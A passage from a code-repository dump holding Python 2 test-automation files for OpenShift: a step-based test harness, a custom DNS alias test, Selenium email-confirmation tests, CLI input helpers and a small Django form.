clean_up_function_parameters\n self.testcase_status= 'IDLE' #default state... (we need this for backward compatibility)\n\n for step in steps:\n self.count = self.count + 1\n if isinstance(step, dict):\n step_parameters_list = []\n step_parameters_list.append(step['Description'])\n step_parameters_list.append(step['Command'])\n if step.has_key('Function_Parameters'):\n step_parameters_list.append(step['Function_Parameters'])\n else:\n step_parameters_list.append([])\n if step.has_key('Expect_Description'):\n step_parameters_list.append(step['Expect_Description'])\n else:\n step_parameters_list.append(\"\")\n if step.has_key('Expect_Return'):\n step_parameters_list.append(step['Expect_Return'])\n else:\n step_parameters_list.append(None)\n if step.has_key('Expect_String_List'):\n step_parameters_list.append(step['Expect_String_List'])\n else:\n step_parameters_list.append([])\n if step.has_key('Expect_Str_Re_IgnoreCase'):\n step_parameters_list.append(step['Expect_Str_Re_IgnoreCase'])\n else:\n step_parameters_list.append(False)\n if step.has_key('Unexpect_String_List'):\n step_parameters_list.append(step['Unexpect_String_List'])\n else:\n step_parameters_list.append([])\n if step.has_key('Unexpect_Str_Re_IgnoreCase'):\n step_parameters_list.append(step['Unexpect_Str_Re_IgnoreCase'])\n else:\n step_parameters_list.append(False)\n if step.has_key('Output_Filter'):\n step_parameters_list.append(step['Output_Filter'])\n else:\n step_parameters_list.append(None)\n step_parameters_list.append(self.count)\n if step.has_key('Try_Count'):\n step_parameters_list.append(step['Try_Count'])\n else:\n step_parameters_list.append(1)\n if step.has_key('Try_Interval'):\n step_parameters_list.append(step['Try_Interval'])\n else:\n step_parameters_list.append(5)\n if step.has_key('Clean_Up_Command'):\n step_parameters_list.append(step['Clean_Up_Command'])\n else:\n step_parameters_list.append(None)\n if step.has_key('Clean_Up_Function_Parameters'):\n step_parameters_list.append(step['Clean_Up_Function_Parameters'])\n else:\n step_parameters_list.append([])\n TestCaseStep_Obj = TestCaseStep(*step_parameters_list)\n self.TestCaseStep_Obj_list.append(TestCaseStep_Obj)\n elif isinstance(step, TestCaseStep):\n step.step_id = self.count\n self.TestCaseStep_Obj_list.append(step)\n else:\n print \"Parameter error: nethier dict type nor TestCaseStep Object\"\n sys.exit(99)\n\n\n def run(self):\n \"\"\"\n TestCase.run()\n \"\"\"\n # init __OUTPUT__ list and __EVAL_FLAG__ at the begin of test case\n global __OUTPUT__\n global __PARSED_VARS__\n global 
__EVAL_FLAG__\n __OUTPUT__ = [None]\n __PARSED_VARS__ = {}\n __EVAL_FLAG__ = True\n print \"=\"*80\n print self.summary\n print \"=\"*80\n # Start run every step\n try:\n fail_detected = None\n for step_obj in self.TestCaseStep_Obj_list:\n (step_ret, step_output) = step_obj.run()\n if step_output == \"Fun_None_Output\":\n __OUTPUT__.append(step_ret)\n #if isinstance(step_ret, str):\n # __OUTPUT__.append(step_ret)\n #else:\n # print \"WARNING!!!\\nThe return value of function is not string type, so empty string will be saved into __OUTPUT__ list\"\n # __OUTPUT__.append(\"\")\n else:\n __OUTPUT__.append(step_output)\n #print \"\\n----> Current __OUTPUT__:\", __OUTPUT__, \"\\n\"\n #TODO: check this assumption: I case of failure --> Exception otherwise PASS\n self.testcase_status = 'PASSED'\n except TestCaseStepFail as fail:\n self.testcase_status = 'FAILED'\n raise fail\n except Exception as e:\n self.testcase_status = 'ERROR'\n raise e\n finally:\n if self.__clean_up_cmd != None:\n self.clean_up()\n\n # clean up __OUTPUT__ list and __EVAL_FLAG__ list at the end of test case\n __OUTPUT__ = [None]\n __PARSED_VARS__= {}\n __EVAL_FLAG__ = False\n\n\n def add_clean_up(self, command, function_parameters=[]):\n self.__clean_up_cmd = command\n if len(function_parameters) != 0:\n self.__clean_up_fun_parameters = function_parameters\n\n\n def clean_up(self):\n print \"~\"*50\n print \"Test Case Clean Up ...\"\n print \"~\"*50\n run(self.__clean_up_cmd, self.__clean_up_fun_parameters)\n\n\nclass TestCaseStep():\n def __init__(self, description, command, function_parameters=[], expect_description=\"\", expect_return=None, expect_string_list=[], ex_re_ignore_case=False, unexpect_string_list=[], unex_re_ignore_case=False, output_filter=None, step_id=None, try_count=1, try_interval=5, clean_up_command=None, clean_up_function_parameters=[], output_callback=None, string_parameters=None):\n self.desc = description\n self.cmd = command\n self.parameters = function_parameters\n self.string_parameters = string_parameters\n self.expect_desc = expect_description\n self.expect_ret = expect_return\n self.expect_str_list = expect_string_list\n self.ex_re_ignore_case = ex_re_ignore_case\n self.unexpect_str_list = unexpect_string_list\n self.unex_re_ignore_case = unex_re_ignore_case\n self.output_filter = output_filter\n self.step_id = step_id\n self.try_count = try_count\n self.try_interval = try_interval\n self.__clean_up_cmd = clean_up_command\n self.__clean_up_fun_parameters = clean_up_function_parameters\n self.__output_callback = output_callback\n\n if self.expect_ret != None:\n self.check_ret_enable = True\n else:\n self.check_ret_enable = False\n\n if len(self.expect_str_list) != 0 or len(self.unexpect_str_list) != 0:\n self.check_output_enable = True\n else:\n self.check_output_enable = False\n\n\n def add_clean_up(self, command, function_parameters=[]):\n self.__clean_up_cmd = command\n if len(function_parameters) != 0:\n self.__clean_up_fun_parameters = function_parameters\n\n\n def clean_up(self):\n print \"~\"*50\n print \"Test Case Step Clean Up ...\"\n print \"~\"*50\n run(self.__clean_up_cmd, self.__clean_up_fun_parameters)\n\n\n def __check_command_result(self, result, expect_ret, expect_str_list, ex_re_ignore_case, unexpect_str_list, unex_re_ignore_case):\n (retcode, output) = result\n\n if self.check_ret_enable == False and self.check_output_enable == False:\n print \"No check!!!!\"\n return None\n\n if self.check_ret_enable == True:\n print \"Checking return value ...\"\n if check_ret(retcode, 
expect_ret):\n self.check_ret_enable = False\n else:\n return None\n\n if self.check_output_enable == True:\n print \"Checking output string ...\"\n if check_output(output, expect_str_list, ex_re_ignore_case, unexpect_str_list, unex_re_ignore_case):\n self.check_output_enable = False\n else:\n return None\n\n\n def __check_function_result(self, result, expect_ret):\n (retcode, output) = result\n\n if self.check_ret_enable == True:\n print \"Checking return value...\"\n if check_ret(retcode, expect_ret):\n self.check_ret_enable = False\n else:\n return None\n else:\n print \"No check!!!!\"\n\n\n def run(self):\n \"\"\"\n TestCaseStep.run()\n \"\"\"\n global __EVAL_FLAG__\n global __PARSED_VARS__\n #global __OUTPUT__\n\n print \"-\"*80\n if self.step_id is not None:\n print \"Step %s:\" %(self.step_id)\n print \"Description: %s\" %(self.desc)\n if isinstance(self.expect_desc, str):\n print \"Expect Result: %s\" %(self.expect_desc)\n print \"-\"*80\n\n if isinstance(self.cmd, str) or isinstance(self.cmd, unicode):\n if (isinstance(self.cmd, unicode)):\n print \"Warning: UNICODE format of command.\"\n print '''Command: %s''' %(self.cmd)\n if self.string_parameters:\n l_params = [] #for expansion\n for p in self.string_parameters:\n if inspect.isfunction(p):\n l_params.append(p())\n else:\n l_params.append(p)\n try:\n #make a quoted string\n #TODO: check what kind of quotes have been used and based on that make fixes\n l_params = \",\".join(map(lambda x: '\"'+x+'\"', l_params))\n print \"DEBUG:\", l_params\n str2exec = 'self.cmd=self.cmd%%(%s)'%l_params\n print \"DEBUG:\", str2exec\n #and do the expansion...\n exec(str2exec)\n except Exception as e:\n print \"WARN: Unable to expand command.\",e\n\n print '''Command after expansion: %s\\n''' %(self.cmd)\n\n if __EVAL_FLAG__:\n self.cmd = eval_command_string(self.cmd)\n print '''Command after evalute: %s\\n''' %(self.cmd)\n\n (retcode, output) = run_command(self.cmd)\n\n #\n #handling of output_callback function\n #\n if self.__output_callback and (inspect.isfunction(self.__output_callback) or inspect.ismethod(self.__output_callback)):\n print \"DEBUG: Calling callback...\",self.__output_callback\n try:\n __PARSED_VARS__ = self.__output_callback(output)\n if not isinstance(__PARSED_VARS__, dict):\n print \"WARN: Wrong return value of callback. Should be dict()\"\n print \"DEBUG: Callback Done.\", __PARSED_VARS__\n except Exception as e:\n print \"CALLBACK ERROR: \",e\n\n\n self.__check_command_result((retcode, output), self.expect_ret, self.expect_str_list, self.ex_re_ignore_case, self.unexpect_str_list, self.unex_re_ignore_case)\n # If check failed, will try again\n for num in range(1, self.try_count):\n if self.check_ret_enable == True or self.check_output_enable == True:\n print \"\\nSleep %s seconds, after that, will try again ...\\n\" %(self.try_interval)\n time.sleep(self.try_interval)\n (retcode, output) = run_command(self.cmd)\n self.__check_command_result((retcode, output), self.expect_ret, self.expect_str_list, self.ex_re_ignore_case, self.unexpect_str_list, self.unex_re_ignore_case)\n else:\n break\n\n if self.__clean_up_cmd != None:\n self.clean_up()\n\n if self.check_ret_enable == False and self.check_output_enable == False:\n output = filter_output(output, self.output_filter)\n return (retcode, output)\n else:\n raise TestCaseStepFail('Check Failed !!! 
@shell %s'%self.cmd)\n\n elif inspect.isfunction(self.cmd) or inspect.ismethod(self.cmd):\n print '''Function: %s''' %(self.cmd)\n print '''Parameters: %s''' %(self.parameters)\n\n\n #\n # let's try to exec functions/closures if present\n #\n l_params = []\n for p in self.parameters:\n if inspect.isfunction(p) or inspect.ismethod(p):\n print '''INFO: Execute %s parameter as function '''%p\n res = p()\n l_params.append(res)\n else:\n l_params.append(p)\n\n if __EVAL_FLAG__:\n l_params = eval_parameters_list(l_params)\n print '''Parameters after evaluation: %s\\n''' %(l_params)\n\n print '''Parameters: %s''' %(l_params)\n self.parameters = l_params\n (retcode, output) = run_function(self.cmd, l_params)\n\n #\n #handling of output_callback function\n #\n if self.__output_callback and (inspect.isfunction(self.__output_callback) or inspect.ismethod(self.__output_callback)):\n print \"DEBUG: Calling callback...\",self.__output_callback\n try:\n __PARSED_VARS__ = self.__output_callback(output)\n print \"DEBUG: Callback Done.\", __PARSED_VARS__\n except Exception as e:\n print \"CALLBACK ERROR: \",e\n\n self.__check_function_result((retcode, output), self.expect_ret)\n # If check failed, will try again\n for num in range(1, self.try_count):\n if self.check_ret_enable == True:\n print \"\\nSleep %s seconds, after that, will try again ...\\n\" %(self.try_interval)\n time.sleep(self.try_interval)\n (retcode, output) = run_function(self.cmd, self.parameters)\n self.__check_function_result((retcode, output), self.expect_ret)\n else:\n break\n\n if self.__clean_up_cmd != None:\n self.clean_up()\n\n if self.check_ret_enable == False:\n return (retcode, output)\n else:\n raise TestCaseStepFail('Check Failed !!! @function %s'%self.cmd)\n\n else:\n raise Exception(\"Unknown Command Type !!!\")\n\n def add_output_callback(self, command, function_parameters=[]):\n \"\"\"\n Callback has to return dict type e.g.{'uuid':'329347239',...} for later processing. 
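The returned dict replaces the module-level __PARSED_VARS__ mapping once the step has run. 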
Any additional step then can use: __PARSED_VARS__['uuid'] to access it\n \"\"\"\n self.__output_callback = command\n #TODO: do implement\n if len(function_parameters) != 0:\n self.__output_callback_param = function_parameters\n \n\n\nclass TestCaseStepFail(Exception):\n def __init__(self, msg):\n self.msg = msg\n def __str__(self):\n return repr(self.msg)\n\n\n" }, { "alpha_fraction": 0.6150662302970886, "alphanum_fraction": 0.625, "avg_line_length": 21.370370864868164, "blob_id": "d64bdb1b03dfebd143bb3abeeb08b140bed72b8a", "content_id": "b4c8ec228c785737907ff02f0e5af442869951ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1208, "license_type": "no_license", "max_line_length": 78, "num_lines": 54, "path": "/automation/open/boilerplate.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\n#### test specific import\nimport random\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n ### put test specific initialization steps here\n pass\n\n def record_results(self, resid):\n # put testcase specific storing data to specific tables here.\n pass\n\n def finalize(self):\n ### put test specific steps \n pass\n \n\nclass Demo01(OpenShiftTest):\n def test_method(self):\n \"\"\"\n This is a very simple test...but the pattern is the same, the \n\n \"\"\"\n errorCount = ((random.randint(1, 3) % 2) == 0)\n\n\n # this will trigger not only print to the console, but also stroed the\n # test run information as PASSED/FAILED/ABORTED\n if errorCount:\n return self.failed(\"Demo01 test failed.\")\n else:\n return self.passed(\"Demo01 test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo01)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7410072088241577, "alphanum_fraction": 0.7410072088241577, "avg_line_length": 22.16666603088379, "blob_id": "23bdb5dfa330ab74b05fcb9e8e8f0889ca901ac2", "content_id": "b6d6fceaf95f60e64575178e2a93f3dc3f4483c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/simpletodo/sites/forms.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from django import forms\n\n\nclass TodoForm(forms.Form):\n todo = forms.CharField(widget=forms.Textarea)\n priority = forms.RadioInput()\n" }, { "alpha_fraction": 0.7676056623458862, "alphanum_fraction": 0.7676056623458862, "avg_line_length": 39.57143020629883, "blob_id": "a4fdfd78e42000d165e92003ffbd05fe5635147f", "content_id": "f1c706d0ea1dba39c1ff8d0916378c71dee92ad6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 568, "license_type": "no_license", "max_line_length": 74, "num_lines": 14, "path": "/automation/debuglistener/RobotDemo/README.rst", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Robot Framework Demo\n====================\n\n`Robot Framework`__ is a generic open source test automation framework.\nThis demo introduces the basic Robot Framework test data syntax, how tests\nare executed, how generated logs and reports look like, and how to create\ncustom test libraries.\n\nSee `project wiki`__ for more 
information about running the demo, viewing\nresults, etc. You can also view the tests and generated results through\nthe wiki without running the demo yourself.\n\n__ http://robotframework.org\n__ https://bitbucket.org/robotframework/robotdemo/wiki/Home\n" }, { "alpha_fraction": 0.5671814680099487, "alphanum_fraction": 0.577606201171875, "avg_line_length": 45.244049072265625, "blob_id": "f20190e2c0f885fbf1bd00db238b4c7387007149", "content_id": "66457566d0271b7240d29e8dba8655f136b1acbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7770, "license_type": "no_license", "max_line_length": 157, "num_lines": 168, "path": "/automation/open/testmodules/RT/node/add_alias_for_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1277][rhc-cartridge]Custom DNS names\nhttps://tcms.engineering.redhat.com/case/122390/\n\"\"\"\nimport os,sys,re,time\n\nimport rhtest\n#import database\nimport random\n# user defined packages\nimport openshift\nimport testcase,common,OSConf\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US1277][rhc-cartridge]Custom DNS names\"\n self.domain_name = common.get_domain_name()\n if len(self.domain_name)==0:\n raise Exception(\"Empty domain name\")\n\n self.new_domain_name = common.getRandomString(10)\n self.app_name = \"phpdns\"\n self.app_type = common.app_types['php']\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n tcms_testcase_id = 122389, 122390, 122391\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s* \"%(self.app_name))\n\nclass CustomDnsNames(OpenShiftTest):\n\n def get_app_ip(self):\n app_url = OSConf.get_app_url(self.app_name)\n (status, output) = common.command_getstatusoutput(\"ping -c 3 %s\"%app_url)\n\n obj = re.search(r\"(?<=\\()(\\d{1,3}\\.){3}\\d{1,3}(?=\\))\", output)\n if obj:\n app_ip = obj.group(0)\n print \"Got ip: %s\" %(app_ip)\n return app_ip\n else:\n raise Exception(\"ERROR Unable to get IP address of app\")\n\n\n def test_method(self):\n\n # Create a php app\n self.steps_list.append(testcase.TestCaseStep(\"Create a php app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # Get the ip address of the app\n self.steps_list.append(testcase.TestCaseStep(\"Get the ip address of the app\",\n self.get_app_ip,\n expect_description=\"the app's IP address should be retrieved\"))\n\n aliases = [\"%s.bar.com\" %(common.getRandomString(3)),\"%s.bar.com\" %(common.getRandomString(3))]\n\n for alias in aliases:\n # Add an alias to the app\n self.steps_list.append(testcase.TestCaseStep(\"Add an alias to the app\",\n \"rhc alias add %s %s -l %s -p '%s' %s\"\n % (self.app_name, alias, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"alias: %s should be added\" % (alias),\n expect_return=0))\n\n # Try to add the same alias to the app\n self.steps_list.append(testcase.TestCaseStep(\"Add the same alias again to the app\",\n \"rhc alias add %s %s -l %s -p '%s' %s\"\n % (self.app_name, alias, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"adding the same alias: %s again should fail\" % (alias),\n 
expect_return=\"!0\"))\n\n # Make some changes in the git repo and git push \n test_html = \"Welcome to %s test page\" % (alias)\n self.steps_list.append(testcase.TestCaseStep(\n \"Make some changes in the git repo and git push\",\n \"cd %s && echo '%s' > php/index.php && git commit -am t && git push\" % (self.git_repo, test_html),\n expect_description=\"Successfully changed git repo and git push\",\n expect_return=0))\n\n # sleep to wait it takes effect\n self.steps_list.append(testcase.TestCaseStep(\"Waiting.. 5 seconds\",\n common.sleep,\n function_parameters=[5]))\n\n # Access the app using custom DNS to see if changes have taken effect\n self.steps_list.append(testcase.TestCaseStep(\n \"Access the app using custom DNS to see if changes have taken effect\",\n \"http_proxy='' curl -s -H 'Host: %s' -H 'Pragma: no-cache' __OUTPUT__[2] | grep '%s'\" % (alias, test_html),\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n # Remove one of the aliases\n self.steps_list.append(testcase.TestCaseStep(\"Remove one of the aliases\",\n \"rhc alias remove %s %s -l %s -p '%s' %s\" % (self.app_name, aliases[0], self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"alias: %s should be removed\" % (aliases[0]),\n expect_return=0))\n\n # Access the app using the custom DNS again to see it's unavailable\n self.steps_list.append( testcase.TestCaseStep(\"Access the app using the custom DNS again to see it's unavailable\",\n \"http_proxy='' curl -s -H 'Host: %s' -H 'Pragma: no-cache' __OUTPUT__[2] | grep '%s'\" % (aliases[0], test_html),\n expect_description=\"The custom DNS: %s should be unavailable\" % (aliases[0]),\n expect_return=\"!0\"))\n\n # Access the other alias to see it's available\n self.steps_list.append(testcase.TestCaseStep(\n \"Access the other alias to see it's available\",\n \"http_proxy='' curl -s -H 'Host: %s' -H 'Pragma: no-cache' __OUTPUT__[2] | grep '%s'\" % (aliases[1], test_html),\n expect_description=\"The custom DNS: %s should be available\" % (aliases[1]),\n expect_return=0))\n\n # Remove the other alias\n self.steps_list.append(testcase.TestCaseStep(\"Remove the other alias\",\n \"rhc alias remove %s %s -l %s -p '%s' %s\" % (self.app_name, aliases[1], self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"alias: %s should be removed\" % (aliases[1]),\n expect_return=0))\n\n # Access the app using the custom DNS again to see it's unavailable\n self.steps_list.append(testcase.TestCaseStep(\"Access the app using the custom DNS again to see it's unavailable\",\n \"http_proxy='' curl -s -H 'Host: %s' -H 'Pragma: no-cache' __OUTPUT__[2] | grep '%s'\" % (aliases[1], test_html),\n expect_description=\"The custom DNS: %s should be unavailable\" % (aliases[1]),\n expect_return=\"!0\"))\n\n # Access the app using the rhcloud.com url to see it's available\n self.steps_list.append(testcase.TestCaseStep(\n \"Access the app using the rhcloud.com url to see it's available\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % 
self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CustomDnsNames)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6949230432510376, "alphanum_fraction": 0.6960716843605042, "avg_line_length": 52.085365295410156, "blob_id": "6a7057ebe3353703e038caffb62a6aa436c6b4b8", "content_id": "6728852f2d81d492f194250af5be076ea61db514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4353, "license_type": "no_license", "max_line_length": 181, "num_lines": 82, "path": "/automation/open/testmodules/UI/web/tc_confirm_email.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium import *\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\nclass EmailConfirm(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.confirm_link=config.confirm_url_express\n# baseutils.update_config_file('environment','confirm_url_express',self,confirm_link)\n \n def test_aa_alogin_without_confirm(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.new_user,config.password)\n baseutils.assert_text_equal_by_css(self,\"Invalid username or password\",\"div.message.error\")\n \n def test_a_confirm_invalid_key(self):\n self.driver.get(config.confirm_url_express_yujzhang_invalidkey)\n baseutils.is_text_equal_by_css(self,\"Email confirmation failed\",\"div.message.error\")\n\n def test_b_confirm_without_key(self):\n self.driver.get(config.nokey_confirm_url(self.confirm_link))\n baseutils.is_text_equal_by_css(self,\"The confirmation link used is missing the key parameter. 
Please check your link or try registering again.\",\"div.message.error\") \n \n def test_f_confirm_normal_not_accept_terms(self):\n self.driver.get(config.confirm_url_express_yujzhang)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n baseutils.assert_text_equal_by_css(self,\"Click here to reset your password\",\"p\")\n baseutils.assert_value_equal_by_id(self,config.granted_user2[0],\"login_input\")\n# selenium.focus(selenium,\"pwd_input\")\n baseutils.input_by_id(self,\"pwd_input\",config.granted_user2[1])\n baseutils.click_element_by_css_no_wait(self,\"input.button\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Legal terms\")\n baseutils.assert_element_present_by_link_text(self,\"OpenShift Legal Terms and Conditions\")\n baseutils.assert_text_equal_by_css(self,\"Sign in\",\"a.sign_in\")\n self.driver.get(self.base_url+\"/app/\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Legal terms\")\n\n '''\n def test_g_confirm_normal_login_grant_default(self):\n self.driver.get(config.validemail_confirm_url(self.confirm_link))\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n baseutils.assert_text_equal_by_css(self,\"Click here to reset your password\",\"p\")\n baseutils.assert_value_equal_by_id(self,config.email(self.confirm_link),\"login_input\")\n baseutils.input_by_id(self,\"pwd_input\",config.password)\n baseutils.click_element_by_css_no_wait(self,\"input.button\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Legal terms\")\n baseutils.assert_element_present_by_link_text(self,\"OpenShift Legal Terms and Conditions\")\n baseutils.assert_text_equal_by_css(self,\"Sign in\",\"a.sign_in\")\n baseutils.click_element_by_id_no_wait(self,\"term_submit\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.assert_text_equal_by_css(self,\"WHAT\\'S EXPRESS?\",\"#about > header > h1\")\n baseutils.is_element_displayed(self,By.LINK_TEXT,\"Quickstart\")\n baseutils.is_element_displayed(self,By.LINK_TEXT,\"Express Console\")\n baseutils.go_to_flex(self)\n baseutils.is_element_displayed(self,By.LINK_TEXT,\"Quickstart\")\n baseutils.is_element_displayed(self,By.LINK_TEXT,\"Flex Console\")\n ''' \n def test_c_confirm_invalid_email(self):\n self.driver.get(config.invalidemail_confirm_url(self.confirm_link))\n baseutils.is_text_equal_by_css(self,\"Email confirmation failed\",\"div.message.error\")\n\n def test_d_confirm_without_email(self):\n self.driver.get(config.noemail_confirm_url(self.confirm_link))\n baseutils.is_text_equal_by_css(self,\"The confirmation link used is missing the emailAddress parameter. 
Please check your link or try registering again.\",\"div.message.error\")\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n #HTMLTestRunner.main()\n" }, { "alpha_fraction": 0.6287094354629517, "alphanum_fraction": 0.6438923478126526, "avg_line_length": 24.19130516052246, "blob_id": "f147a5c197575bdee66b66d905b32ec77353a453", "content_id": "6a5ffa467cbd160500749c4e6246b46d47994029", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2898, "license_type": "no_license", "max_line_length": 84, "num_lines": 115, "path": "/automation/open/lib/supports/cliutils.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nUseful interactive functions for building simple user interfaces.\n\n\"\"\"\n\n\n__all__ = ['get_text', 'get_input', 'choose', 'yes_no', 'print_menu_list',\n'find_source_file']\n\nimport sys, os\n\ndef get_text(prompt=\"\", msg=None, input=raw_input):\n\t\"\"\"Prompt user to enter multiple lines of text.\"\"\"\n\n\tprint (msg or \"Enter text.\") + \" End with ^D or a '.' as first character.\"\n\tlines = []\n\twhile True:\n\t\ttry:\n\t\t\tline = input(prompt)\n\t\texcept EOFError:\n\t\t\tbreak\n\t\tif line == \".\": # dot on a line by itself also ends\n\t\t\tbreak\n\t\tlines.append(line)\n\treturn \"\\n\".join(lines)\n\ndef get_input(prompt=\"\", default=None, input=raw_input):\n\t\"\"\"Get user input with an optional default value.\"\"\"\n\tif default:\n\t\tri = input(\"%s [%s]> \" % (prompt, default))\n\t\tif not ri:\n\t\t\treturn default\n\t\telse:\n\t\t\treturn ri\n\telse:\n\t\treturn input(\"%s> \" % (prompt, ))\n\ndef choose(somelist, defidx=0, prompt=\"choose\", input=raw_input):\n\t\"\"\"Select an item from a list.\"\"\"\n\tassert len(list(somelist)) > 0, \"list to choose from has no elements!\"\n\tprint_menu_list(somelist)\n\tdefidx = int(defidx)\n\tassert defidx >=0 and defidx < len(somelist), \"default index out of range.\"\n\ttry:\n\t\tri = get_input(prompt, defidx+1, input) # menu list starts at one\n\texcept EOFError:\n\t\treturn None\n\tif ri:\n\t\ttry:\n\t\t\tidx = int(ri)-1\n\t\texcept ValueError:\n\t\t\tprint >>sys.stderr, \"Bad selection. Type in the number.\"\n\t\t\treturn None\n\t\telse:\n\t\t\ttry:\n\t\t\t\treturn somelist[idx]\n\t\t\texcept IndexError:\n\t\t\t\tprint >>sys.stderr, \"Bad selection. Selection out of range.\"\n\t\t\t\treturn None\n\telse:\n\t\treturn None\n\ndef yes_no(prompt, default=True, input=raw_input):\n\tyesno = get_input(prompt, (\"Y\" if default else \"N\"), input)\n\treturn yesno.upper().startswith(\"Y\")\n\ndef print_menu_list(clist, lines=20):\n\t\"\"\"Print a list with leading numeric menu choices. Use two columns if necessary.\"\"\"\n\th = max((len(clist)/2)+1, lines)\n\ti1, i2 = 1, h+1\n\tfor c1, c2 in map(None, clist[:h], clist[h:]):\n\t\tif c2:\n\t\t\tprint \"%2d: %-33.33s | %2d: %-33.33s\" % (i1, c1, i2, c2)\n\t\telse:\n\t\t\tprint \"%2d: %-74.74s\" % ( i1, c1)\n\t\ti1 += 1\n\t\ti2 += 1\n\ndef find_source_file(modname):\n\t\"\"\"Find the source file for a module. 
Give the module, or a name of one.\"\"\"\n\tif type(modname) is str:\n\t\ttry:\n\t\t\tif \".\" in modname:\n\t\t\t\tmodname = __import__(modname, globals(), locals(), [\"*\"])\n\t\t\telse:\n\t\t\t\tmodname = __import__(modname)\n\t\texcept ImportError:\n\t\t\treturn None\n\ttry:\n\t\tbasename, ext = os.path.splitext(modname.__file__)\n\texcept AttributeError: # C modules don't have a __file__ attribute\n\t\treturn None\n\ttestfile = basename + \".py\"\n\tif os.path.isfile(testfile):\n\t\treturn testfile\n\treturn None\n\n\ndef _test(argv):\n\timport string\n\tl = list(string.ascii_letters)\n\tc = choose(l)\n\tprint c\n\tprint find_source_file(\"cliutils\")\n\tprint yes_no(\"testing\")\n\nif __name__ == \"__main__\":\n\timport sys\n\t_test(sys.argv)\n\n" }, { "alpha_fraction": 0.5200709104537964, "alphanum_fraction": 0.5256426334381104, "avg_line_length": 47.447853088378906, "blob_id": "d538d4625ec4ea9162d8cd0514cb0ae0e0e79175", "content_id": "6bb9364060c1d8e2a743829cdecf92303a11747f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7897, "license_type": "no_license", "max_line_length": 212, "num_lines": 163, "path": "/automation/open/testmodules/RT/client/rhc_chk_local_config.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os \nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US514][UI][rhc-client]rhc domain status ssh-agent test\\n[US514][UI][rhc-client]rhc domain status remote and local pub key match\\n[US514][UI][rhc-client]rhc 